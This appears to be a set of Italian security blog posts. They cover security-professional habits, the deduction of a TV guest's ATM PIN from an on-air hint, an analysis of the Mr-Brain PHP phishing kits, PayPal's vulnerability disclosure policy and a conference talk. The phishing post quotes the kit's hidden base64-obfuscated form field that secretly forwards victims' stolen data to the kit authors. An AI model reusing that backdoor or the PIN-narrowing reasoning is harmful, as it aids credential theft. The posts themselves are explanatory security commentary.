Strane persone i professionisti di sicurezza

Are you a computer security professional?!” (InfoWorld)

You know you’re a computer security professional when:

[...]

You lock your screensaver with twice as much insistence when security friends are around than when strangers are, because you’re not nearly as worried about a stranger’s intentions.

[...]

You suspect that every banner and Flash ad on every Web site is hosting malicious JavaScript.

[...]

You resist every new application install because of the new attack vector opportunities it will bring.

[...]

Your cell phone is password-protected.

[...]

You always slow down when reading security guidance looking for the words “should,” “must,” “never,” and “always” — and you understand their importance.

Queste son solo alcune, l’articolo merita di essere letto.
Paranoia? Forse.

 

Il valore delle informazioni

Su Effetto Sabato (Rai Uno), sabato pomeriggio, è stato trasmesso un servizio sulla capacità, per un essere umano, di memorizzare informazioni. E’ intervenuto a tal proposito il professore Roberto Vacca ingegnere, scrittore e divulgatore scientifico italiano.

Discutendo con Elisa Isoardi, Roberto Vacca ha portato un esempio pratico a testimonianza delle proprie teorie e ha dichiarato :

Tutti i numeri sono come degli amici.
Quando mi hanno dato il PIN del Bancomat, mi hanno detto: lo tenga da parte e non lo perda.
Io L’ho guardato, l’ho preso e l’ho buttato. L’impiegata: come fa adesso a ricordarsela?
E’ una potenza del 2!

Roberto Vacca ha tranquillizzato la conduttrice preoccupata per l’integrità del PIN con:

Non si preoccupi…le potenze del 2 sono infinite!

Le potenze del 2 sono infinite, ma il codice PIN dei Bancomat, in Italia, è sempre di 5 cifre.
Avendo sottomano una tabella con le prime potenze del 2, si può vedere come solamente 3 di esse sono formate da 5 cifre: 16384, 32768 e 65536.

Se la fortuna non è dalla nostra parte saremmo comunque in grado di trovare il PIN giusto: lo sportello ATM ritira la tessera magnetica solamente dopo il terzo tentativo errato.

Per i malpensanti: possibile che tra 1.276.000 spettatori stimati (dati Auditel) abbia notato solamente io questa informazione? Sicuri che tra le altre persone che lo hanno notato non vi sia nessuno che ci tiene a non farlo sapere?

Ho contattato il prof. Roberto Vacca in merito all’accaduto: una persona veramente disponibile e gentile!
Come era ovvio pensare il professore si rendeva ben conto di ciò che stava dicendo: il PIN è stato sostituito un anno or sono.

E’ importante valutare il valore delle informazioni che ogni giorno forniamo. Non è detto che ciò che per noi è insignificante lo sia anche per il nostro interlocutore!

Ringrazio Davide Maggio per la registrazione della trasmissione.

 

L’equo compenso dei Phisher

Custom PHP scam scriptPremetto subito che la notizia non è nuova, credo però, che sia degna di nota.

Un gruppo che si fa chiamare Mr-Brain ha rilasciato dei tool, scritti in PHP, utili a chi vuole cimentarsi in truffe a mezzo phishing. Il sito Web del gruppo offre versioni diverse degli script in base al servizio da “impersonare”: eBay, PayPal, Bank of America, ecc..

I tool sono stati scritti in modo da permetterne l’uso a chi di PHP non ne sa niente: è necessario solamente inserire la propria e-mail per ricevere i dati sensibili inseriti da ogni vittima.

I tool-kit possono essere scaricati senza sborsare denaro. Quest’ultima caratteristica e l’immediatezza d’uso hanno permesso una larga diffusione nel mondo di phisher in erba, tanto che ne erano già state individuate tracce all’inizio dell’anno.

Chi pensa che i ragazzi di Mr-Brain hanno rilasciato questi script solo per la gloria o per il gusto di sapere che verranno usati per colpire utenti non molto smaliziati sbaglia di grosso. L’idea, simpatica, degli autori è quella di prendersi un equo compenso da ogni copia usata un po come fa la cara e vecchia SIAE.

Questa è la parte di codice che si occupa della raccolta di tutti i dati inseriti dalla vittima per poi inviarli via mail:

Double mail function

Notate niente di strano?

La funzione mail() è ripetuta due volte utilizzando due nomi variabili diversi, anche se solo per la prima lettera.
Il valore della prima variabile, quella con la “s” minuscola è definibile dal phiser, mentre il valore della seconda variabile, quella con la “S” maiuscola, è settato tramite un campo del form di raccolta dati. il valore di tale campo è stato offuscato codificandolo in base64:

<input type=”hidden” name=”Send” value=”<?=base64_decode(”TXItQnJhaW5ARXZpbC1CcmFpbi5OZXQ=”);?>”>

In questo modo, i dati della vittima, oltre ad essere inoltrati a chi ha personalizzato lo script con la propria e-mail, verranno sempre inviati anche a un indirizzo di proprietà del gruppo Mr-Brain.
Che dire? Forse l’esperienza conta sempre.

 

PayPal introduce le policy per le segnalazioni di vulnerabilità

Tramite Jeremiah Grossman leggo che PayPal ha pubblicato una pagina contene la “vulnerability disclosure policy“. Essa permette ai (Web application) security researchers di segnalare vulnerabilità trovate in PayPal senza rischiare azioni legali.

Ovviamente l’immunità è garantita solamente a chi rispetta la policy:

Guidelines for responsible disclosure

  • Share the security issue with us before making it public on message boards, mailing lists, and other forums.
  • Allow us reasonable time to respond to the issue before disclosing it publicly.
  • Provide full details of the security issue.

Non è tollerato, come è normale aspettarsi, l’uso della vulnerabilità per accedere a dati di cui normalmente non si possiede l’autorizzazione, pretendere una somma di denaro in cambio delle informazioni dettagliate della vulnerabilità o causare un D0S all’intero sistema PayPal.

La policy porta a porsi qualche domanda come evidenziato da Chris Shiflett, ma sicuramente le buone intenzioni ci sono e per migliorare siamo sempre in tempo. Credo che sia la prima volta che una grossa azienda mette nero su bianco un comportamento del genere per incoraggiare chiunque a segnalare preventivamente le vulnerabilità al team di competenza.
Google, Microsoft e Yahoo hanno delle policy simili, ma ancora, al contrario di PayPal, non si fa menzione di possibili rivolti legali per le vulnerabilità segnalate.

Questa notizia non dovrebbe interessare solamente agli addetti ai lavori ma anche ai semplici clienti/utenti, una grossa azienda che gestisce i nostri dati personali (o ancor peggio i nostri risparmi) non deve nascondere eventuali attacchi o vulnerabilità di sicurezza. Solitamente infatti, non solo non esiste una policy ben precisa sul comportamento che l’azienda terrà nei confronti di chi segnala una vulnerabilità ma addirittura non è ben chiaro a chi segnalare i dettagli di essa.

 

All’ESC di sabato parlo di GoogleTistic e sicurezza della blogosfera Italiana

ESC logoDal 14 al 16 Settembre, sarò ospite all’ ESC(End Summer Camp) che si tiene a San Donà di Piave (VE).
Terrò un seminario dal titolo GoogleTistic e il Web italiano… insieme all’amico Matteo Flora.
Si tratta di un proseguo del talk di Matteo Flora, tenuto da Alessio Orlandi (causa assenza di Flora) all’E-Privacy 2007. In questo appuntamento vedremo, oltre ai dati già raccolti su circa 80.000 siti Web UK, cosa è saltato fuori dopo l’aggiunta del 98% dei Blog Italiani più influenti.
Essi ci hanno rilevato dati molto interessanti: tracciamento utenti, sicurezza dei blog e sovversione della blogosfera Italiana.

GoogleTistic e WordpressTistic: le statistiche che nessuno avrebbe mai voluto mostrarvi (Matteo Flora e Matteo Carli)
Quanto estesa e’ realmente l’utenza di Google nella vita del Web? Quale reale penetrazione di mercato hanno le soluzioni ed i servizi proposti dal gigante del Web? Quando ci si ritrova a definire come “pericolose per la privacy” le operazioni di Google ci si scontra sempre con l’incredulità e con la scarsa propensione a ritenere che il fenomeno Google sia largamente diffuso. Se infatti la coscienza della permeazione diretta di Google come mezzo di ricerca e’ ormai assodata e scontata nell’immaginario collettivo, risulta invade di difficile comprensione la vastita’ del fenomeno del tracciamento della navigazione “derivato”, quello cioe’ che Google stesso e’ in grado di recuperare ed analizzare da suoi tool di piu’ complessa rilevazione quali Google Analytics, Google AdSense, Blogger Services e le nuove acquisizioni DoubleClick e FeedBurner. Questi servizi risiedono infatti sui siti web dei CLIENTI e non esiste metodo di rilevazione o di statistica senza interrogare i domini web uno ad uno.
Nell’ambito del progetto WatchingTheWatchers (WTW) verranno presentati i risultati preliminari delle statistiche di utilizzo dei servizi Google su 80.000 domini web inglesi, le statistiche che nessuno avrebbe mai voluto mostrare…
IN AGGIUNTA Quanto estesa è la rete dei Bloggers Italiani? Quali le minacce di sicurezza? Mediante le stesse tecnologie utilizzate per GoogleTistic si è proceduto all’analisi dei top 98% blog italiani con incredibili risultati sulle vulnerabilità, sugli utilizzi e sulle tendenze del Web moderno nella Penisola…

Orario: Sabato 18 ore 15.00 - 16.00

L’appuntamento è quindi fissato a Sabato 18 dalle ore 15 alle 16.
Non posso non consigliarvi anche gli altri talk a programma; in particolare quello di Matteo Flora: Censura in Italia: chi, come e perche’ censura.

Vi aspetto!